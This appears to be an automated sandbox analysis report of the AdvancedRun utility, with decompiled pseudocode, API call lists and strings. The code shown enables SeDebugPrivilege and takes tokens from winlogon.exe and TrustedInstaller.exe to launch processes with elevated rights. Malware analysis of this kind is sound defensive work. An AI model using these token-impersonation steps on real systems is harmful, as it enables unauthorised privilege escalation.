                                                                  0x00402425
                                                                  0x00402428
                                                                  0x0040242b
                                                                  0x00402433
                                                                  0x00402434
                                                                  0x00402473
                                                                  0x00402473
                                                                  0x0040247c
                                                                  0x00402481
                                                                  0x00402488
                                                                  0x00402488
                                                                  0x00402495
                                                                  0x0040249a
                                                                  0x004024b7
                                                                  0x004024be
                                                                  0x004024cd
                                                                  0x004024d1
                                                                  0x004024ed
                                                                  0x004024f0
                                                                  0x00402506
                                                                  0x0040250b
                                                                  0x00402512
                                                                  0x00402518
                                                                  0x00402519
                                                                  0x0040251e
                                                                  0x00402524
                                                                  0x00402527
                                                                  0x0040252b
                                                                  0x00402530
                                                                  0x00402531
                                                                  0x00402531
                                                                  0x0040253d
                                                                  0x0040255a
                                                                  0x00402561
                                                                  0x00402570
                                                                  0x00402574
                                                                  0x00402590
                                                                  0x00402593
                                                                  0x004025a9
                                                                  0x004025ae
                                                                  0x004025b5
                                                                  0x004025bb
                                                                  0x004025bc
                                                                  0x004025c1
                                                                  0x004025c7
                                                                  0x004025ca
                                                                  0x004025cd
                                                                  0x004025ce
                                                                  0x004025d4
                                                                  0x004025d4
                                                                  0x004025da
                                                                  0x004025e3
                                                                  0x004025eb
                                                                  0x00402633
                                                                  0x004025fb
                                                                  0x00402608
                                                                  0x0040260f
                                                                  0x00402614
                                                                  0x00402624
                                                                  0x00402630
                                                                  0x00402630
                                                                  0x0040263a
                                                                  0x0040263b
                                                                  0x00402646
                                                                  0x0040264b
                                                                  0x0040264c
                                                                  0x0040265a
                                                                  0x0040265a
                                                                  0x0040265d
                                                                  0x00402666
                                                                  0x00402668
                                                                  0x00402668
                                                                  0x00402672
                                                                  0x00402675
                                                                  0x0040267e
                                                                  Disassembly address column only (instruction text not present): 0x0040267e through 0x00402470

                                                                  APIs
                                                                  • memset.MSVCRT ref: 00402300
                                                                  • memset.MSVCRT ref: 0040233E
                                                                  • memset.MSVCRT ref: 00402356
                                                                    • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                    • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                  • wcschr.MSVCRT ref: 00402387
                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004023A0
                                                                    • Part of subcall function 00404B5C: wcscpy.MSVCRT ref: 00404B61
                                                                    • Part of subcall function 00404B5C: wcsrchr.MSVCRT ref: 00404B69
                                                                  • wcschr.MSVCRT ref: 004023B7
                                                                  • memset.MSVCRT ref: 004023D9
                                                                  • SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00000208), ref: 004023F6
                                                                  • wcschr.MSVCRT ref: 0040242B
                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00402443
                                                                  • memset.MSVCRT ref: 004024BE
                                                                  • memset.MSVCRT ref: 004024D1
                                                                  • _wtoi.MSVCRT ref: 00402519
                                                                  • _wtoi.MSVCRT ref: 0040252B
                                                                  • memset.MSVCRT ref: 00402561
                                                                  • memset.MSVCRT ref: 00402574
                                                                  • _wtoi.MSVCRT ref: 004025BC
                                                                  • _wtoi.MSVCRT ref: 004025CE
                                                                  • wcschr.MSVCRT ref: 004025F0
                                                                  • memset.MSVCRT ref: 0040260F
                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,?,?,?,?,?,?,?,00000208), ref: 00402624
                                                                  • _snwprintf.MSVCRT ref: 0040264C
                                                                  • SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,00000000), ref: 00402819
                                                                  • GetProcessAffinityMask.KERNEL32 ref: 00402879
                                                                  • SetProcessAffinityMask.KERNEL32 ref: 00402888
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$Environment_wtoiwcschr$ExpandStrings$AffinityMaskProcess$PathSearchVariable_snwprintfmemcpywcscpywcslenwcsrchr
                                                                  • String ID: "%s" %s$16BITCOLOR$256COLOR$640X480$D$DISABLEDWM$DISABLETHEMES$HIGHDPIAWARE$RunAsInvoker$__COMPAT_LAYER
                                                                  • API String ID: 2452314994-435178042
                                                                  • Opcode ID: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                  • Instruction ID: b54a7db1e05dda42e7bfc3830e2036fe484084dd7c1f23c6c807eede0ded9d8d
                                                                  • Opcode Fuzzy Hash: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                  • Instruction Fuzzy Hash: 03F14F72900218AADB20EFA5CD85ADEB7B8EF04304F1045BBE619B71D1D7789A84CF59
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  C-Code - Quality: 89%
                                                                  			E00408533(void* __ecx, void* __edx, void* __eflags, char _a8, intOrPtr _a12, char _a32, WCHAR* _a40, WCHAR* _a44, intOrPtr _a48, WCHAR* _a52, WCHAR* _a56, char _a60, int _a64, char* _a68, int _a72, char _a76, int _a80, char* _a84, int _a88, long _a92, void _a94, long _a620, void _a622, char _a1132, char _a1148, WCHAR* _a3196, WCHAR* _a3200, WCHAR* _a3204, WCHAR* _a3208, void* _a3212, char _a3216, int _a5264, int _a5268, int _a5272, int _a5276, int _a5280, char _a5288, char _a5292, int _a7340, int _a7344, int _a7348, int _a7352, int _a7356) {
                                                                  				char _v0;
                                                                  				WCHAR* _v4;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				void* _t76;
                                                                  				void* _t82;
                                                                  				wchar_t* _t85;
                                                                  				void* _t86;
                                                                  				void* _t87;
                                                                  				intOrPtr _t92;
                                                                  				wchar_t* _t93;
                                                                  				intOrPtr _t95;
                                                                  				int _t106;
                                                                  				char* _t110;
                                                                  				intOrPtr _t115;
                                                                  				wchar_t* _t117;
                                                                  				intOrPtr _t124;
                                                                  				wchar_t* _t125;
                                                                  				intOrPtr _t131;
                                                                  				wchar_t* _t132;
                                                                  				int _t156;
                                                                  				void* _t159;
                                                                  				intOrPtr _t162;
                                                                  				void* _t177;
                                                                  				void* _t178;
                                                                  				void* _t179;
                                                                  				intOrPtr _t181;
                                                                  				int _t187;
                                                                  				intOrPtr _t188;
                                                                  				intOrPtr _t190;
                                                                  				intOrPtr _t198;
                                                                  				signed int _t205;
                                                                  				signed int _t206;
                                                                  
                                                                  				_t179 = __edx;
                                                                  				_t158 = __ecx;
                                                                  				_t206 = _t205 & 0xfffffff8;
                                                                  				E0040B550(0x1ccc, __ecx);
                                                                  				_t76 = E0040313D(_t158);
                                                                  				if(_t76 != 0) {
                                                                  					E0040AC52();
                                                                  					SetErrorMode(0x8001); // executed
                                                                  					_t156 = 0;
                                                                  					 *0x40fa70 = 0x11223344;
                                                                  					EnumResourceTypesW(GetModuleHandleW(0), E0040A3C1, 0); // executed
                                                                  					_t82 = E00405497( &_a8);
                                                                  					_a48 = 0x20;
                                                                  					_a40 = 0;
                                                                  					_a52 = 0;
                                                                  					_a44 = 0;
                                                                  					_a56 = 0;
                                                                  					E004056B5(_t158, __eflags, _t82, _a12);
                                                                  					E00408F48(_t158, __eflags, L"SeDebugPrivilege"); // executed
                                                                  					 *_t206 = L"/SpecialRun";
                                                                  					_t85 = E0040585C( &_v0);
                                                                  					__eflags = _t85;
                                                                  					if(_t85 != 0) {
                                                                  						L8:
                                                                  						_t86 = E0040585C( &_a8, L"/Run");
                                                                  						__eflags = _t86 - _t156;
                                                                  						if(_t86 < _t156) {
                                                                  							_t87 = E0040585C( &_a8, L"/cfg");
                                                                  							__eflags = _t87 - _t156;
                                                                  							if(_t87 >= _t156) {
                                                                  								_t162 =  *0x40fa74; // 0x4101c8
                                                                  								_t41 = _t87 + 1; // 0x1
                                                                  								ExpandEnvironmentStringsW(E0040584C( &_a8, _t41), _t162 + 0x5504, 0x104);
                                                                  								_t115 =  *0x40fa74; // 0x4101c8
                                                                  								_t117 = wcschr(_t115 + 0x5504, 0x5c);
                                                                  								__eflags = _t117;
                                                                  								if(_t117 == 0) {
                                                                  									_a92 = _t156;
                                                                  									memset( &_a94, _t156, 0x208);
                                                                  									_a620 = _t156;
                                                                  									memset( &_a622, _t156, 0x208);
                                                                  									GetCurrentDirectoryW(0x104,  &_a92);
                                                                  									_t124 =  *0x40fa74; // 0x4101c8
                                                                  									_t125 = _t124 + 0x5504;
                                                                  									_v4 = _t125;
                                                                  									_t187 = wcslen(_t125);
                                                                  									_t51 = wcslen( &_a92) + 1; // 0x1
                                                                  									__eflags = _t187 + _t51 - 0x104;
                                                                  									if(_t187 + _t51 >= 0x104) {
                                                                  										_a620 = _t156;
                                                                  									} else {
                                                                  										E00404BE4( &_a620,  &_a92, _v4);
                                                                  									}
                                                                  									_t131 =  *0x40fa74; // 0x4101c8
                                                                  									_t132 = _t131 + 0x5504;
                                                                  									__eflags = _t132;
                                                                  									wcscpy(_t132,  &_a620);
                                                                  								}
                                                                  							}
                                                                  							E00402F31(_t156);
                                                                  							_t181 =  *0x40fa74; // 0x4101c8
                                                                  							_pop(_t159);
                                                                  							_a84 =  &_a8;
                                                                  							_a76 = 0x40cb0c;
                                                                  							_a88 = _t156;
                                                                  							_a80 = _t156;
                                                                  							E0040177C( &_a76, _t181 + 0x10, __eflags, _t156);
                                                                  							_t92 =  *0x40fa74; // 0x4101c8
                                                                  							__eflags =  *((intOrPtr*)(_t92 + 0x5710)) - _t156;
                                                                  							if( *((intOrPtr*)(_t92 + 0x5710)) == _t156) {
                                                                  								_t93 = E0040585C( &_a8, L"/savelangfile");
                                                                  								__eflags = _t93;
                                                                  								if(_t93 < 0) {
                                                                  									E00406420();
                                                                  									__imp__CoInitialize(_t156);
                                                                  									_t95 =  *0x40fa74; // 0x4101c8
                                                                  									E00408910(_t95 + 0x10, _t159, 0x416f60);
                                                                  									 *((intOrPtr*)( *0x4158e0 + 8))(_t156);
                                                                  									_t198 =  *0x40fa74; // 0x4101c8
                                                                  									E00408910(0x416f60, 0x4158e0, _t198 + 0x10);
                                                                  									E00402F31(1);
                                                                  									__imp__CoUninitialize();
                                                                  								} else {
                                                                  									E004065BE(_t159);
                                                                  								}
                                                                  								goto L7;
                                                                  							} else {
                                                                  								_t64 = _t92 + 0x10; // 0x4101d8
                                                                  								_a7356 = _t156;
                                                                  								_a7352 = _t156;
                                                                  								_a7340 = _t156;
                                                                  								_a7344 = _t156;
                                                                  								_a7348 = _t156;
                                                                  								_t156 = E00401D40(_t179, _t64,  &_a5292);
                                                                  								_t110 =  &_a5288;
                                                                  								L6:
                                                                  								E004035FB(_t110);
                                                                  								L7:
                                                                  								E004054B9( &_v0);
                                                                  								E004099D4( &_a32);
                                                                  								E004054B9( &_v0);
                                                                  								_t106 = _t156;
                                                                  								goto L2;
                                                                  							}
                                                                  						}
                                                                  						_t26 = _t86 + 1; // 0x1
                                                                  						_t173 = _t26;
                                                                  						__eflags =  *((intOrPtr*)(E0040584C( &_a8, _t26))) - _t156;
                                                                  						if(__eflags == 0) {
                                                                  							E00402F31(_t156);
                                                                  						} else {
                                                                  							E00402FC6(_t173, __eflags, _t138);
                                                                  						}
                                                                  						_t188 =  *0x40fa74; // 0x4101c8
                                                                  						_a68 =  &_a8;
                                                                  						_a60 = 0x40cb0c;
                                                                  						_a72 = _t156;
                                                                  						_a64 = _t156;
                                                                  						E0040177C( &_a60, _t188 + 0x10, __eflags, _t156);
                                                                  						_t190 =  *0x40fa74; // 0x4101c8
                                                                  						_a5280 = _t156;
                                                                  						_a5276 = _t156;
                                                                  						_a5264 = _t156;
                                                                  						_a5268 = _t156;
                                                                  						_a5272 = _t156;
                                                                  						_t156 = E00401D40(_t179, _t190 + 0x10,  &_a3216);
                                                                  						_t110 =  &_a3212;
                                                                  						goto L6;
                                                                  					}
                                                                  					__eflags = _a56 - 3;
                                                                  					if(_a56 != 3) {
                                                                  						goto L8;
                                                                  					}
                                                                  					__eflags = 1;
                                                                  					_a3212 = 0;
                                                                  					_a3208 = 0;
                                                                  					_a3196 = 0;
                                                                  					_a3200 = 0;
                                                                  					_a3204 = 0;
                                                                  					_v4 = 0;
                                                                  					_v0 = 0;
                                                                  					swscanf(E0040584C( &_v0, 1), L"%I64x",  &_v4);
                                                                  					_t177 = 2;
                                                                  					_push(E0040584C( &_v0, _t177));
                                                                  					L0040B1F8();
                                                                  					_pop(_t178);
                                                                  					_t156 = E00401AC9(_t178, _t179, __eflags,  &_a1148, _v4, _v0, _t152);
                                                                  					_t110 =  &_a1132;
                                                                  					goto L6;
                                                                  				} else {
                                                                  					_t106 = _t76 + 1;
                                                                  					L2:
                                                                  					return _t106;
                                                                  				}
                                                                  			}


                                                                  APIs
                                                                    • Part of subcall function 0040313D: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                    • Part of subcall function 0040313D: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                    • Part of subcall function 0040313D: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                    • Part of subcall function 0040313D: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                  • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408563
                                                                  • GetModuleHandleW.KERNEL32(00000000,0040A3C1,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040857C
                                                                  • EnumResourceTypesW.KERNEL32 ref: 00408583
                                                                  • swscanf.MSVCRT ref: 00408620
                                                                  • _wtoi.MSVCRT ref: 00408633
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes_wtoiswscanf
                                                                  • String ID: $%I64x$/Run$/cfg$/savelangfile$SeDebugPrivilege$`oA$XA
                                                                  • API String ID: 3933224404-3784219877
                                                                  • Opcode ID: 1ed12eb10884b9e827e0875f5387ef1e7972f3b4abe7ba30fea96de0eb1c323a
                                                                  • Instruction ID: 6a1ad454fb11d14b300c4ed281ce3bcdfe782ea4983c0409628bf6e0aeb57f2c
                                                                  • Opcode Fuzzy Hash: 1ed12eb10884b9e827e0875f5387ef1e7972f3b4abe7ba30fea96de0eb1c323a
                                                                  • Instruction Fuzzy Hash: 7FA16F71508340DBD720EF65DD8599BB7E8FB88308F50493FF588A3292DB3899098F5A
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  C-Code - Quality: 81%
                                                                  			E00401FE6(void* __eax, void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8, long _a12, void* _a16, WCHAR* _a20, struct _STARTUPINFOW* _a24, struct _PROCESS_INFORMATION* _a28) {
                                                                  				int _v8;
                                                                  				long _v12;
                                                                  				wchar_t* _v16;
                                                                  				void _v546;
                                                                  				long _v548;
                                                                  				void _v1074;
                                                                  				char _v1076;
                                                                  				void* __esi;
                                                                  				long _t84;
                                                                  				int _t87;
                                                                  				wchar_t* _t88;
                                                                  				int _t92;
                                                                  				void* _t93;
                                                                  				int _t94;
                                                                  				int _t96;
                                                                  				int _t99;
                                                                  				int _t104;
                                                                  				long _t105;
                                                                  				int _t110;
                                                                  				void** _t112;
                                                                  				int _t113;
                                                                  				intOrPtr _t131;
                                                                  				wchar_t* _t132;
                                                                  				int* _t148;
                                                                  				wchar_t* _t149;
                                                                  				int _t151;
                                                                  				void* _t152;
                                                                  				void* _t153;
                                                                  				int _t154;
                                                                  				void* _t155;
                                                                  				long _t160;
                                                                  
                                                                  				_t145 = __edx;
                                                                  				_t152 = __ecx;
                                                                  				_t131 =  *((intOrPtr*)(__eax + 0x44a8));
                                                                  				_v12 = 0;
                                                                  				if(_t131 != 4) {
                                                                  					__eflags = _t131 - 5;
                                                                  					if(_t131 != 5) {
                                                                  						__eflags = _t131 - 9;
                                                                  						if(__eflags != 0) {
                                                                  							__eflags = _t131 - 8;
                                                                  							if(_t131 != 8) {
                                                                  								__eflags = _t131 - 6;
                                                                  								if(_t131 != 6) {
                                                                  									__eflags = _t131 - 7;
                                                                  									if(_t131 != 7) {
                                                                  										__eflags = CreateProcessW(_a4, _a8, 0, 0, 0, _a12, _a16, _a20, _a24, _a28);
                                                                  									} else {
                                                                  										_t132 = __eax + 0x46b6;
                                                                  										_t148 = __eax + 0x48b6;
                                                                  										__eflags =  *_t148;
                                                                  										_v16 = _t132;
                                                                  										_v8 = __eax + 0x4ab6;
                                                                  										if( *_t148 == 0) {
                                                                  											_t88 = wcschr(_t132, 0x40);
                                                                  											__eflags = _t88;
                                                                  											if(_t88 != 0) {
                                                                  												_t148 = 0;
                                                                  												__eflags = 0;
                                                                  											}
                                                                  										}
                                                                  										_t153 = _t152 + 0x800;
                                                                  										E0040289F(_t153);
                                                                  										_t154 =  *(_t153 + 0xc);
                                                                  										__eflags = _t154;
                                                                  										if(_t154 == 0) {
                                                                  											_t87 = 0;
                                                                  											__eflags = 0;
                                                                  										} else {
                                                                  											_t87 =  *_t154(_v16, _t148, _v8, 1, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
                                                                  										}
                                                                  										__eflags = _t87;
                                                                  									}
                                                                  									if(__eflags == 0) {
                                                                  										_t84 = GetLastError();
                                                                  										L43:
                                                                  										_v12 = _t84;
                                                                  									}
                                                                  									goto L44;
                                                                  								}
                                                                  								__eflags = E00401D99(__eax + 0x44ac, __edx);
                                                                  								if(__eflags == 0) {
                                                                  									goto L44;
                                                                  								}
                                                                  								_t92 = E0040A46C(_t131, __eflags,  &_a28, _t90, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                  								__eflags = _t92;
                                                                  								if(_t92 != 0) {
                                                                  									goto L44;
                                                                  								}
                                                                  								_t84 = _a28;
                                                                  								goto L43;
                                                                  							}
                                                                  							_t93 = OpenSCManagerW(0, L"ServicesActive", 0x35); // executed
                                                                  							__eflags = _t93;
                                                                  							if(_t93 != 0) {
                                                                  								E00401306(_t93); // executed
                                                                  							}
                                                                  							_v8 = 0;
                                                                  							_t94 = E00401F04(_t145, _t152); // executed
                                                                  							__eflags = _t94;
                                                                  							_v12 = _t94;
                                                                  							if(__eflags == 0) {
                                                                  								_t96 = E00401DF9(_t145, __eflags, _t152, L"TrustedInstaller.exe",  &_v8); // executed
                                                                  								__eflags = _t96;
                                                                  								_v12 = _t96;
                                                                  								if(_t96 == 0) {
                                                                  									_t99 = E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
                                                                  									__eflags = _t99;
                                                                  									if(_t99 == 0) {
                                                                  										_v12 = GetLastError();
                                                                  									}
                                                                  									CloseHandle(_v8); // executed
                                                                  								}
                                                                  								RevertToSelf(); // executed
                                                                  							}
                                                                  							goto L44;
                                                                  						}
                                                                  						_t104 = E0040598B(__edx, __eflags, __eax + 0x46b6);
                                                                  						__eflags = _t104;
                                                                  						if(_t104 == 0) {
                                                                  							goto L44;
                                                                  						}
                                                                  						_v8 = 0;
                                                                  						_t105 = E00401E44(_t152, _t104,  &_v8);
                                                                  						goto L14;
                                                                  					}
                                                                  					_t149 = __eax + 0x44ac;
                                                                  					_t110 = wcslen(_t149);
                                                                  					__eflags = _t110;
                                                                  					if(_t110 <= 0) {
                                                                  						goto L44;
                                                                  					} else {
                                                                  						_v8 = 0;
                                                                  						__eflags = E00404EA9(_t149, _t110);
                                                                  						_t112 =  &_v8;
                                                                  						_push(_t112);
                                                                  						_push(_t149);
                                                                  						if(__eflags == 0) {
                                                                  							_push(_t152);
                                                                  							_t113 = E00401DF9(_t145, __eflags);
                                                                  						} else {
                                                                  							L0040B1F8();
                                                                  							_push(_t112);
                                                                  							_push(_t152);
                                                                  							_t113 = E00401E44();
                                                                  						}
                                                                  						_v12 = _t113;
                                                                  						__eflags = _t113;
                                                                  						goto L15;
                                                                  					}
                                                                  				} else {
                                                                  					_v548 = 0;
                                                                  					memset( &_v546, 0, 0x208);
                                                                  					_v1076 = 0;
                                                                  					memset( &_v1074, 0, 0x208);
                                                                  					E00404C3C( &_v548);
                                                                  					 *((intOrPtr*)(_t155 + 0x18)) = L"winlogon.exe";
                                                                  					_t151 = wcslen(??);
                                                                  					_t10 = wcslen( &_v548) + 1; // 0x1
                                                                  					_t159 = _t151 + _t10 - 0x104;
                                                                  					if(_t151 + _t10 >= 0x104) {
                                                                  						_v1076 = 0;
                                                                  					} else {
                                                                  						E00404BE4( &_v1076,  &_v548, L"winlogon.exe");
                                                                  					}
                                                                  					_v8 = 0;
                                                                  					_t105 = E00401DF9(_t145, _t159, _t152,  &_v1076,  &_v8);
                                                                  					L14:
                                                                  					_t160 = _t105;
                                                                  					_v12 = _t105;
                                                                  					L15:
                                                                  					if(_t160 == 0) {
                                                                  						if(E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28) == 0) {
                                                                  							_v12 = GetLastError();
                                                                  						}
                                                                  						CloseHandle(_v8);
                                                                  					}
                                                                  					L44:
                                                                  					return _v12;
                                                                  				}
                                                                  			}

                                                                  APIs
                                                                  • memset.MSVCRT ref: 0040201D
                                                                  • memset.MSVCRT ref: 00402035
                                                                    • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                    • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                  • wcslen.MSVCRT ref: 00402050
                                                                  • wcslen.MSVCRT ref: 0040205F
                                                                  • wcslen.MSVCRT ref: 004020B4
                                                                  • _wtoi.MSVCRT ref: 004020D7
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 0040214B
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00402157
                                                                  • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000035,?,?,00000000), ref: 00402173
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021D5
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021E1
                                                                  • RevertToSelf.KERNELBASE(?,TrustedInstaller.exe,?,?), ref: 004021E7
                                                                    • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                    • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                    • Part of subcall function 0040598B: memset.MSVCRT ref: 004059B5
                                                                    • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 004059FA
                                                                    • Part of subcall function 0040598B: wcschr.MSVCRT ref: 00405A0E
                                                                    • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 00405A20
                                                                    • Part of subcall function 0040598B: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                    • Part of subcall function 0040598B: OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                    • Part of subcall function 0040598B: CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                    • Part of subcall function 0040598B: CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                    • Part of subcall function 00401E44: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                    • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                    • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                  • wcschr.MSVCRT ref: 00402259
                                                                  • CreateProcessW.KERNEL32 ref: 004022B8
                                                                  • GetLastError.KERNEL32(?,?,00000000), ref: 004022C2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandle$OpenProcess$ErrorLastmemsetwcslen$_wcsicmpwcschrwcscpy$CreateDirectoryManagerRevertSelfSystemToken_wtoiwcscat
                                                                  • String ID: ServicesActive$TrustedInstaller.exe$winlogon.exe
                                                                  • API String ID: 3201562063-2355939583
                                                                  • Opcode ID: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                  • Instruction ID: ccbcfbde9fdc9ff515b0a1e4c69409fc0ea490cdea51ab3e51e2115b03466e24
                                                                  • Opcode Fuzzy Hash: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                  • Instruction Fuzzy Hash: 02813A76800209EACF11AFE0CD899AE7BA9FF08308F10457AFA05B21D1D7798A549B59
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph
                                                                  [graph image not reproduced in text: basic blocks 409921-409977, calls 405436 and GetProcAddress * 5; blocks are marked Executed / Not Executed]
                                                                  C-Code - Quality: 100%
                                                                  			E00409921(struct HINSTANCE__** __esi) {
                                                                  				void* _t6;
                                                                  				struct HINSTANCE__* _t7;
                                                                  				_Unknown_base(*)()* _t12;
                                                                  				CHAR* _t13;
                                                                  				intOrPtr* _t17;
                                                                  
                                                                  				if( *__esi == 0) {
                                                                  					_t7 = E00405436(L"psapi.dll"); // executed
                                                                  					 *_t17 = "GetModuleBaseNameW";
                                                                  					 *__esi = _t7;
                                                                  					__esi[1] = GetProcAddress(_t7, _t13);
                                                                  					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
                                                                  					__esi[4] = GetProcAddress( *__esi, "GetModuleFileNameExW");
                                                                  					__esi[5] = GetProcAddress( *__esi, "EnumProcesses");
                                                                  					_t12 = GetProcAddress( *__esi, "GetModuleInformation");
                                                                  					__esi[3] = _t12;
                                                                  					return _t12;
                                                                  				}
                                                                  				return _t6;
                                                                  			}

                                                                  APIs
                                                                    • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                    • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                  • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                  • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                  • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                  • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                  • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$LibraryLoad$memsetwcscat
                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                  • API String ID: 1529661771-70141382
                                                                  • Opcode ID: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                  • Instruction ID: 092d130926b261125bd3b69643a6c94717898c68ce40be050c227dd31faca138
                                                                  • Opcode Fuzzy Hash: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
